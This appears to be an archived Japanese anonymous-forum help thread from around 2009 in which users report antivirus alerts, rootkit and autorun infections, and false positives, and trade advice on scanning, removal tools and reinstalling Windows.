【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンしてウィルスを発見したわけではなく、 1/21の夜から今現在まで
ウィルスバスターがしきりに不正変更を拒否しましたとポップアップを表示するようになりました。
【種類】 APIEvent
【検出リソース/プロセスID】 ZwWriteVirtualMemory
【ファイル名】 (空白)
【該当ポリシー】 DLL(プログラムライブラリ)インジェクション
【実行した処理】 確認&拒否
ttp://oshiete1.goo.ne.jp/qa4649268.html 教えてgooにもまったく同様の症状を訴えている人がいて
回答にある参考URL(トレンドマイクロの対策ページ)を元に原因を探しているのですが、
感染したことを示すファイル類は検索で見つかっていません。
ほぼ同時期に発症しているため気味が悪いのですが、どのように対処をすべきなのでしょうか。
自分の場合は幾つかネットゲームを経験しており、今はハンゲームのAradや
ダレットのMHFをしています。
とりあえず同時期にあるということは同時期に何かが更新されたんだと思う。
誤検出の可能性があるけど、確証は無い。
自分ネトゲしてないのでよく判らんのです……
試験的に除外してみてもいいかも
最終的にウイルスバスターのセキュリティーレポートを確認すると
二日間で425件の不正変更の監視、その内ほぼ全てが確認と拒否でしたが
ZwWriteVirtualMemoryに二回の許可。
ZwCreateThreadに一回の許可がありました。
セーフモードでAdAwareとウイルスバスターを走らせましたが
原因となるプログラムも検出されませんでした。
「送信メールを検索しました」ってでるんだがどういう状況ですか?
いずれにせよそれって活動を隠すための手続きだと思うんですよ
ネットゲームのSecurityプログラムなども一部でそういう動きするらしく、
少し前に騒ぎになったこともあったと思うんですけども……
ただ、気になるのはrootkit系ウイルスも良くそういう活動をしたと思うんだよなぁ
ま、このままだとちょっと手が出ないので、アダ被で解析を依頼されて見てはいかがでしょうか?
ウイルスバスターを入れれるんですけどメールを送信してないのに勝手に
「送信メールを検索しました」ってでるんだがどういう状況ですか?
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい
【スパイウェア対策ソフト】ウイルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
TROJ_TDSS.AXLN
C:\DOCUME~1\●● ~1\LOCALS~1\Temp\TDSScf7d.tmp
制限付のアカウントでは動作できるのですが、
管理者でログインするとデスクトップが表示されたままになります。
クリックやキー操作を受け付けません。
対策法を教えて頂けないでしょうか。
宜しくお願いします。
セーフモードで同じ? タスクバーは表示されてる?
タスクバーが表示されてなかったら、Ctrl+Shift+Escでタスクマネージャを起動して
「ファイル」->「新しいタスクの実行」で「explorer.exe」を起動してみて。
管理者でログイン出来たら、AVG Anti-Rootkitでスキャンして。
AVG Anti-Rootkit
ttp://www.softpedia.com/get/Antivirus/AVG-Anti-Rootkit.shtml P2P使ってるから
おかげさまで解決しました。
ありがとうございました。
自分のパソコンからUSBにウィルスは移るんでしょうか?
書き込みが日本語になってないから聞きたいことが良くわからんが……
オートランの拡散経路だけ説明だけする。
オートラン系のウイルス本体は、まずパソコンに感染する。
原因はさまざま。一番多いのはサイトからの感染だと言われてる。
で、そのあウイルスは感染PCに繋がれたUSBメモリに分身をコピーしてUSBを感染させ
その感染したUSBを媒介に、他のPCにも自分のコピーを広けると言う寸法。
以前は一つのファイルをブロックできれば無力化できたんだけど、
感染方法を変えやがったらしいから注意な。
しかし妙に対応が早いし、このウイルスの動きは奇妙。
検索しても英語サイトばかりでわかんね。
>google-redirect
WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
googleに繋がるというものですね。
それなら『AVG Anti-Rootkit』が効果がありますよ。
お試しあれ
確かに373の言うとおり、質問が判りにくいなw
>オートランのウィルスって他のPCに繋いだことがないUSBにも感染するんですか?
感染しない。USBとは通常、接続の仕様なので、USBメモリとかUSB接続HDDと表現してほしいね。
ただ、過去に事例が沢山あるが、USBメモリ、HDD、フォトフレーム、MP3プレイヤ等、USB接続を
利用する機器が、工場出荷時から感染していた事例は多く有るので、最新のセキュリティーを使用
することは、もはや必須。
>自分のパソコンからUSBにウィルスは移るんでしょうか?
USBメモリやHDDなど、自分のPCがマルウエアに感染すれば簡単に移る。しかも友人や会社など、周
りに多大な被害をもたらす。(最近、NETから隔離されている警察関連で大問題になってる)
373氏に付け加えるなら、自身で実行してしまう事例。ファイル交換の物、友人からの物、自分で
DLしたもの、まれにメール添付の物、など、自らマルウエアを管理者権限で実行する場合が多い。
又、WinUpdateしていない。ブラウザ自身やフラッシュやブラウザのアドオン(最近ではQuickTimeとか)、
PDFリーダ、他のNET接続するソフト類のアップデートを怠れば、何もしなくても感染する。
最近のNET事情は、知識のある奴でも躊躇するほど悪化していると思うよ。
安全と思われているWebページだって、明日は判らない。
AVGとかでは無理か?
まず大手なら検出は可能。
まあ、問題は検出よりブロック、そして駆除だな。
>WindowsUpdateサイトやセキュリティベンダーのサイトに接続すると
>googleに繋がるというものですね。
ちょっと違うのですが、IE6.0で適当なページ(例えば、googleの検索結果のページなど)の
リンクをクリックすると、ステータスバーにht
ttp://google-redirect.com/...と出て、 そのリンクにつながりにくい状態になることがある現象です。
でも、英語のページを辞書見ながら読んで、Malwarebytes' Anti-Malwareで解決しました。
ありがとうございました。
NOD32を使っていた警視庁がやられたのに
寝言は寝てから言ってね業者さん
ttp://shop.s2mall.net/shareware/08.shtml ↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
●警視庁ネットワーク、ウイルス感染…完全復旧週明けまで掛かる見込み
ttp://headlines.yahoo.co.jp/hl?a=20090124-00000003-yom-soci 警視庁のオンラインシステムに接続している端末のパソコンが、「W32・Downadup・B」と
呼ばれる新種のネットワーク感染型ウイルスに感染し、同庁がウイルス駆除のため、
22日午後から断続的にオンライン業務を停止していることがわかった。
この影響で、東京都内の警察署で、車庫証明の発行業務や免許更新の事務手続き業務を一時、
手作業で行わざるを得なくなった。完全復旧は週明けの26日になる見込み。
サイバー攻撃など外部からの侵入の恐れは低く、USBメモリーなどをパソコンで使った際に
感染した可能性があるとして、同庁で感染経路を調べている。
記者は思わないのかねぇ
Nortonでずばりの名前がある
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-123015-3826-99 ttp://ime.nu/detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1217945792 先日、「えこでこツール」というフリーソフトをDLし、 解凍してフォルダを開いたところ
「トロイの木馬に感染しました」というメッセージが出ました。
どうやら中に入っていた「uninstal.exe」が原因のようです。
慌てて隔離し、隔離室を空にしたのですが、これは削除出来たのでしょうか?
これと同じ症状が出てる troj_generic.dis
確かベクターとかでダウンロードしたはずなのになんでウイルスが入ってるんだろう
ダウンロードしてからかなり時間がたってるのに何で今頃警告が来るんだろう?
ワケがわからん
最近やったことといえばhugflashってソフトを
間違ってアンインスツールしたことぐらいしか思い当たらん
対応されたとか情報が見当たらんけど
とりあえずテンプレ使ってくれ。
【Microsoft Update(MU)の状態】
【使用セキュリティソフトとバージョン】 AVG8、CA Anti-virus(試用版)、
KINGSOFT、Avast! 4.8Home、Dr.WEB
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スパイウェア対策ソフト】 Spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 Yes
【ルータの有無】 Yes
【スキャンの結果何が検出されたか】多過ぎて忘れた…
「XP AntiSpyware 2009」とかいうスパイウェアをうっかり踏んでしまいました
これによりウイルスがどっと入ってきて、全ドライブのhtmlファイル、
一部の実行ファイルが改竄され、何度駆除してもまだ残ってるようです
何度か再起動するとエクスプローラが起動しなかったり、
プリントスプーラなどがエラーを起こします
再インスコも何度もしましたが、他のドライブに感染したファイルが残っているようで
いたちごっこを繰り返してます
やっぱりフリー系よりノートンやバスターの方がいいのでしょうか?
しかしもう疲れました、PC窓から投げたいですorz
D:とかE:のルートにautorun.infが隠しファイルで存在してない?
ルータに接続してるPCは1台だけ?
フリーの物と製品版、どちらを使っても差はあまりないと思うが
君は大人しく製品版のものを使った方がいいと思う。
いつも使ってるパソコン、ネット接続すると勝手に再起動するんだけど、
どうすればいいですか?
ルーターにPCは2台繋がってます
もう1台(今書き込んでるPC)には同じ症状は出ていないようです
そうかも知れないっすね
ちら裏ですが今は火の車なので試用版で我慢します…
いきなり再起動するなら故障。
続きは ttp://pc11.2ch.net/pcqa/
【使用セキュリティソフトとバージョン】 「無料ソフト」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新してる」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
会社のPCなので詳しいスペックはわからないっすorz
マルウェアが発見されましたって出て、HDドライブCが開けなくなったり。外付けHDが認識しなくなったり。
会社のPCが無料ソフトってどうなんだろうな・・・
>D:とかE:のルートにautorun.infが隠しファイルで存在してない?
これを調べるの忘れてました
そのファイルは見当たりませんでした
まさかバスターまでやられるなんて・・・orz
リカバリを強く推奨します。
ウイルスがバックドアを開いて、PC内をいいようにされることもある。
そのまま使うと碌なことは無いよ。
に禿同。早急にリカバリ。
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2008
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 ウィルスバスターに任せてます
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トラッキングクッキー程度しか検出されませんでした
今、普通に別のスレでレスしてたら、いきなりヘッドフォンに子供っぽい笑い声が途切れ気味で入ってきて、いきなり「あーあー」って喋りだしてきました。
感じ日本語じゃないっぽくて、一回ネット回線切ってまた繋げなおしたら叫び声っぽいのに変わってました。
ウィルスバスターには常に監視させており、FWも機能中です。
何かをDLしたわけでもありません。
どういった症状なんでしょうかコレ…。
実際にはIDやパスワードなど、パソコンのキー操作の履歴を盗み取るスパイソフト「キーロガー」をネット上から
送りつけた。少年はゲームの動きが悪くなったことからキーロガーに気づき、ソフトを解析。盗まれた履歴の
送付先になっていた男性のメールアドレスやID、パスワードを割り出したという。
asahi.com
ttp://ime.nu/www.asahi.com/national/update/0205/NGY200902050001.html ↑この少年が行った手口を、バカでもわかるように解説してください。m(._.)m
メールアドレスやID、パスワードを割り出した
送りつけた。
イ
どうもです
のスレ行って、紹介されていた削除ツールで何とか駆除できたっぽいです
しばらくこれで様子を見てダメだったらHDD買ってリカバリします
その情報だと、ソフトというか
通信を解析したダケじゃないのかねぇ?
FWで出来るだろ。
【使用OS】 「XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2008」「ZoneAlarm」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「Spybot」「AD-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有 」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も見つからない」
質問です。
(スパイウェアスレで質問したのですが、普通に広告では?と言われてしまったのですが、
どうも不安なのでこちらでも質問いたしました。)
Firefoxを使っているのですが、
毎回起こるのではなく、ごくたまになのですが、
googleの検索結果に出てきたリンク先をクリックしたときに、
一瞬、67.210.15.11とか67.210.14.30などのIPアドレスに勝手にアクセスして
その後1001anything.comやらpc-health.infoやらのアドレスに勝手にアクセスしようと試みて
最後は自動でgoogleのトップページに戻ってしまうことがあります。
これは原因はなにかに感染しているということでしょうか?
なにに感染しているのでしょうか?検索してもさっぱりわかりません。。。
一応、spybotもadawareもトレンドマイクロのウイルス&スパイウェアチェックも全部かけました。
バスタとZoneAlarmは機能競合を起こす。
ネットから切断した上で、ZoneAlarmとバスタw一度アンインスコ
そのあと、バスタのみをインストール
再びネットで定義更新してみる。
トレンドマイクロの社長
ttp://ime.nu/internet.watch.impress.co.jp/cda/parts/image_for_link/14506-8141-1-1.html ソース
ttp://ime.nu/internet.watch.impress.co.jp/cda/news/2005/06/24/8141.html 名前や顔つきからしてもろにアッチ系だな…
お世辞にも美人とは言えないと思うがCEOだけあって印象だけは悪くない罠
リカバリしろ
その解説をします。
GOOGLE検索であろうが、YAHOO検索であろうが、検索で表示されたサイトを
クリックするとリダイレクト(他のサイトへ強制移動)されますね?
パソコンがウィルスに感染しているのでは無く、そのサイトがフィッシングサイト、
又は、ウィルスコードを記述してあるサイトの可能性があるのです。
最近GOOGLEでは、そういったサイトに入れないように、ブロックして元の
検索画面に戻すという事を行っているようです。
悪意のあるフィッシングサイトでは、いかにも本物と同じようなHPもありますし、
偽物のセキュリティプログラムを購入させようと、勝手にHP内でスキャンをし、
ウィルスに感染してます!という警告を出すHPもちらほら見る事もあります。
僕が見る限り、このケースをだけ見ると感染していないように思えます。
あと、ウィルス感染の疑いがある時は絶対に!リカバリーしないでください。
無意味です。
ありえないかもしれませんが、ご心配であれば、別のウィルススキャン方法も
ありますので、ぜひお試しください。
ttp://secure47.blog114.fc2.com/blog-entry-15.html まあ、それはいいがバスタはセーフモードで使えないぞ?
なんだこれ?ソースプリーズ。
システムの復元 を リカバリ だと思ってるとか言うオチかな?
結構間違ってる人居るみたいだし
あとは、リカバリかAVG Antirootkitでも試すぐらいしか
ttp://secure47.blog114.fc2.com/blog-entry-1.html >1.ウィンドウズのアップデートを必ず行う。
>オフィスの脆弱性も、WINDOWS UPDATEで一緒にダウンロードする事が可能です。
Officeの脆弱性はWindowsUpdateでは修正されません。
Officeの脆弱性はMicrosoftUpdateを通じて修正されます。
補足乙
資格いうやつほどあてにならんのがIT業界だすw
けど、そんな俺も昔はウイルスに感染した経験を持ってますが。
それでしたらラウンジやPC初心者にありますよ。
「勇気」とか「鑑定」で検索してください。
サンクス
どうも白黒つかないサイトがあるんだよね
このソフトって危険?
症状見たらすぐわかるじゃん
怪しいのはFirefoxのexeが入っているフォルダの中かもね
componentsフォルダの中に怪しいdll入ってないか?iamfamous.dllとか
そうなら違う駆除ソフトいろいろ試してみるといいよ
つーか、このスレこんなにレベル低かったっけ?
駆除ソフト色々って
特定のソフトを示せないんだと思うが
まあ、知ってたら書いてあげて
ベタだけどnortonで引っかかる気がする
というわけでまだスレ見てたらやってみてよ
オンラインスキャンでもいいから
ざまあ
トロイに感染したファイル?
ほほう。
ttp://ime.nu/hk.geocities.com/sa_icecream/sa99for29.zip この中にあるウィルスぬいてほしいお
いくつかのフォルダを削除して自らも消滅する
ウィルスが出たらしい、と聞きました。
しかし、いくつかの単語を放り込んで検索してみても
そんな症状は出てきません。
削除型の症状は、ほぼすべてがワームで、USBの
autorunで感染するタイプのものは、検索には
ひっかかってきませんでした。
何か聞いたことある方いませんか?
したとかみた方が早いかも。
ttp://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20090205021020.html ありがとう。
見てみたけど、該当しそうなものはみつかりませんでした。
自身で体験してないから詳細わからないのがもどかしいです。
知人の言うとおりだとすれば、定義ファイル対応前に破壊活動して
消滅されたらこちらでは対処しようがないし、通報もできません。
削除されたファイルがどれかわからないという事態も想定されますし、
場合によってはどこかに送信後消されている可能性もあるかも
しれません。
ただ、USBにも本体にもウィルスが残っていないのであれば、
どうやって感染活動しているのかよくわかりませんし、
実は原因が別にあるんじゃないかとも疑っているんです。
それで、何か情報があればと思いまして。
例えばwebからの感染であれば…
あるwebサイトを訪問
↓
最新の定義にされたソフトでも発見できない亜種に密かに感染(潜伏)
↓
そのPCにUSBメモリを挿し込む
↓
そのUSBメモリに感染
あと、USBメモリー→PC→USBメモリーというパターン(橋渡しタイプ)は確率低いか…
どの道そちらで再検証するしかないですね。
俺らは画面の向こうで偉そうな事しか言えませんが…。
ttp://up.b9dm.com/video.php/vid_8546.htm B9ってサイトでアニメ見ようとしたらavastで反応して削除したのですが
もう1回検査するだけで大丈夫でしょうか?削除したので分かりませんが
やばい物ですか?
ってウィルスに汚染されたんだけど、グーグルで検索しても
全然情報なくて
ttp://ime.nu/www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=CRYP%5FXIN2&VSect=Sn とりあえずここくらいなんだけど英語だし
どうしたらいいんだ。削除したけど「駆除不可能なウィルス」って
書いてるし・・ハァ
削除したならいいだろ。
他のexeやdllを書き換える形で寄生するのが本来のウイルスで、
それを元に戻すのを「駆除」と表現する。
元々存在しなかったexeやdllを新たに生成するよくあるトロイでは
「駆除できないので削除」となる。表現の問題だよ。
窓の杜にニコキャッチングとかいうのがあったからサイトにいってダウンロード&インストールし終わって
ファイルの中にあった何かわからないけど開いてみたら一瞬黒い画面の窓が開いて
英語っぽい白い文字がずらーと流れていって窓が勝手に閉じたんですが
そのあとにウィルス検索してみたら10個もかかりました(いつもは1〜2個。
名前までは覚えてませんがこの「ニコキャッチング」の中にはいっていたのでしょうか?
あと一瞬でてきた黒い画面は何だったのかわかる人居れば教えてください;
もしわかりにくかったらすいません;;
ffmpegていう動画・音声を変換するコマンドラインアプリケーション。
コマンドラインオプションを付けずに実行するとヘルプが表示される。
ffmpegと検出されたウイルスは関係ない。
砂箱内で実行してみたけど特に何もなかったが・・・
> そのあとにウィルス検索してみたら10個もかかりました(いつもは1〜2個。
なんでそんなに頻繁にウィルスに感染してるの?
例えば新品のPCを購入して、1ヶ月間アンチウイルスソフトを導入していなかったとします。
その後導入し、スキャンの結果ウイルスやトロイの木馬等といったものが検出されなかった場合、
そのPCは1ヶ月間まったく攻撃を受けていなかった、結果として危険性はなかったと考えてよろしいのでしょうか。
それとも、そんな単純なものではないのでしょうか。
こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
よろしくお願いいたします。
100%見つけ出す性能を持っていてそれで見つからなければ無傷といえる
ただ、100%見つけ出すものなんてないし、作ることもできないから
絶対危険性がなかったとは言い切れない
>こまめにウイルススキャンをして、そういったものが検出されなければ、一応そのつど安心してもよいものなのだろうかと思ったものでして。
とりあえず安心しでもいいです
ただ検出されなかったのではなく、検出できなかった可能性もあるので絶対大丈夫とは思わないように。
ということはウイルスやトロイの木馬等は、勝手に侵入してくることはあっても、
勝手にまた出て行ってしまう(消滅してしまう)ということはないわけですね。
アンチウイルスソフトを過信しないようにしながらも、これからもこまめにチェックするようにします。
どうしたらよいでしょうか?
【Microsoft Update(MU)の状態】 「自動更新設定」
【使用セキュリティソフトとバージョン】 「バスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「バスター2008」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか
検索時にポップアップが出て
スパイウェアの疑いが見つかりました
名前 C:\WINDOWS\SYSTEM32\ADVAPI32.DLL
危険度 高
実行した処理 隔離/隔離できません
とでて、ヘルプを参照しましたが、対処方法の表示がなく、検索も途中で
止まってしまっています。
お助けをお願いします・・
この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/ さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
>この"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"というファイルがスパイウェアの疑いがあると、出てるんですね。
virustotalで上記のファイルをスキャンしてください。
ttp://www.virustotal.com/jp/ virustotalというのは初めて使用しましたが、
一行下記行がありました。
アンチウイルス バージョン 更新日 結果
Sunbelt 3.2.1851.2 2009.02.12 Trojan.Win32.Patched.B (vf)
>さらに上記のファイルのプロパティを見て、作成日、会社名を教えてください。
作成日 2001/12/4
会社名 Microsoft Corporation
となっております。
よろしくお願いします・・
正規ファイル…か。
さてどうしたものやろ…とりあえず「リカバリをお奨めします」と言っておこうか。
その問題のファイルのサイズ(バイト数)を控えてください。
次に、問題のファイルの名前を変更してください。(ADVAPI32.DLL→ADVAPI32.BAKに)
暫く待てば、名前を変えたファイルの隣に「ADVAPI32.DLL」という名前のファイルが作成されると思います。
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
新たに作成された、ADVAPI32.DLLとADVAPI32.BAKのファイルサイズを教えてください。
advapi.dll → 658KB
advapi.bak → 658KB
advapi.dllは変更前、後共に同じファイルサイズです。
何か対策があれば是非・・・m(_ _)m
の間違いです。
すみません
658KBの横にある()の中の数値も一緒ですか?
あと、先ほどのvirustotalで問題のファイルをスキャンしてみましたか?
スキャンしたのなら、結果をURLを貼って教えてください。
トレンドマイクロに検体に出して調べてもらう
>658KBの横にある()の中の数値も一緒ですか?
はい。同じです→673,792byte
検索結果
ttp://www.virustotal.com/jp/analisis/0f2eee7109212a1f36a9e05c3b127c0d 重ねてよろしくお願いいたします
virustotalでスキャンすれば、アップロードされたファイルは各ベンダーに
送られるんじゃなかった?
>469
どうやら誤検出ですね…リカバリしなくても大丈夫です。
後はadvapi32.bakの方を削除しても構いません。(今削除できなくても再起動後に削除できるはずです)
advapi32.dllの方は削除しないように。
ありがとうございます。
そのようにしてみます。
m(_ _)m
VirusTotal に送られたファイルはアンチウイルスベンダが
持ち込んだ取得できないウイルスの一覧に該当するウイルスを
自動解析にかけ、マルウェアと認定された場合に製品に取り込まれる
このプロセスどおりなら false positive は放置の可能性がある。
ttp://www.virustotal.com/privacy.html # Collection and use of submit samples and personal information の項
dll 一つだけで誤検出の可能性が高いならば、
正規ユーザなんだろうから、トレンドに調べもらうのが一番固い。
それまでは新たに生成された dll を使ってれば多少はリスクも減る。
てことは、各ベンダーに送られるんじゃなくて、各ベンダーのスキャンエンジンによって
アップロードされたファイルをスキャンしてるってこと?
誤検出で間違いありませんよ。
こちらもXPSP2のPCを持ってまして、
"C:\WINDOWS\SYSTEM32\ADVAPI32.DLL"のプロパティを調べてみたところ、
作成日は「2005年12月22日」と、>463と異なりましたが
会社名は「Microsoft Corporation」
ファイルサイズは658KB(673,792byte)でしたので。
XPSP3やVistaではどうか知りませんけど…。
あくまでも想像でしかないので、軽く聞き流してくれ。
AV担当者:「これらのウイルスのサンプルをくれ」
VT担当者:「へい、調べときやす」
:
VT担当者:「マルウェアのサンプル一覧ができたのでお渡しします」
AV担当者:「ありがとさん」
ってな流れになっているように読めた。
クリーンインストールだけじゃなくハードディスクもグラフィックボードもマザーボードも
メモリーもプロセッサーもCDドライブも交換したのにxeroxというフォルダが消えません
どうすればいいのですか
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
ウィルスに感染してしまったようで
フォルダやファイルやアプリケーションを開くたびに
音声がいちいち低い声で読み上げます。
何のウィルスか知っている方がいらしたら教えていただけないでしょうか。
よろしくお願いします。
peercastで何か視聴しようとすると、
カスペル先生が以下のダイアログを通知してきて通信遮断されるので視聴できないんです。
qvod.exeという中国産のプレーヤーらしいのですが、それ以上はぐぐってもほとんど情報がないので
どう対策したものかと困っています。情報あれば教えてほしいです。
ttp://ime.nu/up2.viploader.net/pic2/src/viploaderf150614.png ttp://www.virustotal.com/jp/analisis/86c484d2c012207556a9b3f216ec5d76 遮断しといた方が良さそうだね。
おお、情報thxであります。
正常です。全く問題ないよ
xerox フォルダ でぐぐれ
アンチウィルスソフトはavastを使っていて一応チェストに移動しました。
フリー使っていながら何故対処法聞くの?
インラインフレームなぞ脆弱性がなければry
W32/Virut.nにやられている可能性大
フルスキャンすべし
ttps://secure.nai.com/japan/security/virV.asp?v=W32/Virut.n 「アプリケーションの変更と削除」から「Adobe Flash Player ActiveX」を選んで消そうとしたんですが
削除できずに無反応と思ったらイカのようなファイルが生成され
Au_exe ns643.tmpのようなプロセスが起動していました。
生成するフォルダやファイルで調べると
ttp://www.mcafee.com/japan/security/virG2008.asp?v=Generic%20PUP.x!1D0E5B2B のような有害なプログラムの生成ファイルと似ていることがわかりましたが
FWで警告も出ないので特に外部と通信している様子もなく再起動したら問題なく消せました。
これが長時間起動していたOSの不調でうまくアンインストできなかっただけなのか
それとも本当に有害だったのかがわからないためどなたかわかる方おられないでしょうか。
Ad-awareやAvastなどで検索かけてみましたが特にひっかかりませんでした。
フォルダ
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\ns643.tmp
6144 byte
C:\Documents and Settings\ユーザ名\Local Settings\Temp\nss642.tmp\nsExec.dll
6144 byte
実行するたびに数値が増えていく。
C:\Documents and Settings\ユーザ名\Local Settings\Temp\~nsu.tmp\Au_.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
実行するたびに Bu_.exe のように~nsu.tmp内のファイルが増えていく。
C:\WINNT\system32\Macromed\Flash\uninstall_activeX.exe
説明:Adobe@ Flash@ Player ActiveX Installer
89,102 byte
アンインストールプログラムのようだがこれが実行されると上のような不可解な挙動をする。
再起動した後に実行すると消えた。
【使用OS】 「Windows2k」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「した」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「した」
【ルータの有無】 「なし」
3台のpcに使いたいのでウィルスバスターを使ってるんですが
もっといいのありますか?
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】ウイルスセキュリティ0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最近
【スパイウェア対策ソフト】 同上?
【スパイウェア対策ソフトの更新は定期的に行なっているか】同上
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
Windows Defenderにて検出されました。
カテゴリ:トロイの木馬
リソース:
process:
pid:1780
file:
C:\WINDOWS\system32\dsewtds0.dll
消去しても再起動すると再度検出されます。
セキュリティ0では未検出でした。
オートラン系のウイルスらしい。
USB記憶装置を全部取り外して、トレンドフレックスでスキャンしてみて。
ありがとうございます!
すぐに試してみます。
【Microsoft Update(MU)の状態】最新
【使用セキュリティソフトとバージョン】Symantec Norton Internet Security 2009 v16.1.0.33
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】ノートンとspybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】最新
【ルータの有無】あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
スキャンの結果というか、昨日あたりから1分近い間隔で
「未使用ポート遮断機能が通信を遮断しました。インバウンドTCP接続」ってログが出るんですよね
これってノートンが過剰反応してるだけなんですかね?ちょっと気持ち悪くて
正確な事は分からんけど、ルーターが有ってインバウンドがあるということは、ルーターに穴が開いている可能性がある。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスタ-2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なっている」
【ルータの有無】 「無し」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ウイルス名 "TROJ_Generic.DIS"
パス "F:\System Volume Information\_restore{CB2759E9-4605-4FE1-8447-29F266474282}\RP120\A0018563.exe"
ログを見たところ、一週間前から一日に8件ほど検出されています。パス名等は同じです。
Fドライブは倉庫用として使っています。
駆除できていないと考えて良いのでしょうか?
いったんシステムの復元を無効にすれば消えると思う。
問題なし
498の言う通りシステムの復元を無効→有効→再スキャン
検出されなくなればOK
この“System Volume Information”は対策ソフトですら手が出せない領域なので
アクセスが拒否されて駆除失敗するのは当然です。
それとできることならルーターも有ったほうがよいと思います。
ありがとうございます。
早速試して見ます。
ルータはISDNのため断念しています。
バスターのファイアーウォールのログが一日100件超えてます。
>ルータはISDNのため断念しています。
なんで?
今ISDN対応で出回ってるのは高い。
まぁオクとかで落とせばいいんだろうけど。
エロ動画サイトのサンプル動画ってダウンロードすると
電話帳データ抜き取られる事があると噂に聞いたんですが本当ですか?
マジレス願います。
ウイルスなどは存在しますか。
いつからか、インターネットに繋いだときのレスポンスが悪くなる現象が目立つようになり、
突如としてADSLルータにすら接続できなくなったりする現象に遭遇するようになりました。
モデムを再起動すると一時的に改善しますが、この現象が頻繁に起きるようになったのです。
そこでこれまで使っていたADSLルータを新しいADSLルータに交換したらこの現象はなくなりました。
ひょっとすると、これはルータのハードウェア的障害が原因ではなく、ウイルスが原因だったのでしょうか?
エロ動画とかエロいなお前
友人のことなのですが、巡回したサイトに次々と誹謗中傷の書き込みがされるそうです。
中傷の内容は本人特定がギリギリできないレベルで、警察やプロバイダーに相談しても実害が出ていないと手が出せないと言われました。
そのためにPCをノートからデスクトップに代えたらしいのですが、それでも嫌がらせが続くようです。
・OSなどの使用環境は未確認
・ネットワークは有線接続
・ウィルス対策ソフトは導入(ソフト名は未確認)
・犯人の目星はついているが証拠がないため手が出せない
知っている情報は以上です。
おそらくウィルスで巡回サイトを特定されていると思い、リカバリを勧めたのですが他に良い自衛方法があれば教えて下さい。
>そのためにPCをノートからデスクトップに代えた
意味不明
釣りだから無視しろよ
誘導したらこいつらも付いてくるからそれも無理
とにかくググれ!
じゃあ質問を変えます
他人のPCをリモートで監視するソフトってありますか?
これはなんでしょうか
PCに詳しい人は、ルータやモデムの仕様を知っていて、リモートホスト判れば何でも出来るんだよ。
家のネット回線?は有線でPC同士で繋がっている状態なんだけど
この状態だと家族の中でもPCの画面覗くことってできます?
なんか親父が俺のPC覗いてるような気がしてならない(理由は色々とあるんだけども
というか話変わるんだけど
ウィルスバスター2009でほぼ毎日検索かけてるんですが
今PCに元々はいっていたノートンセキュリティーが検索をかけだして
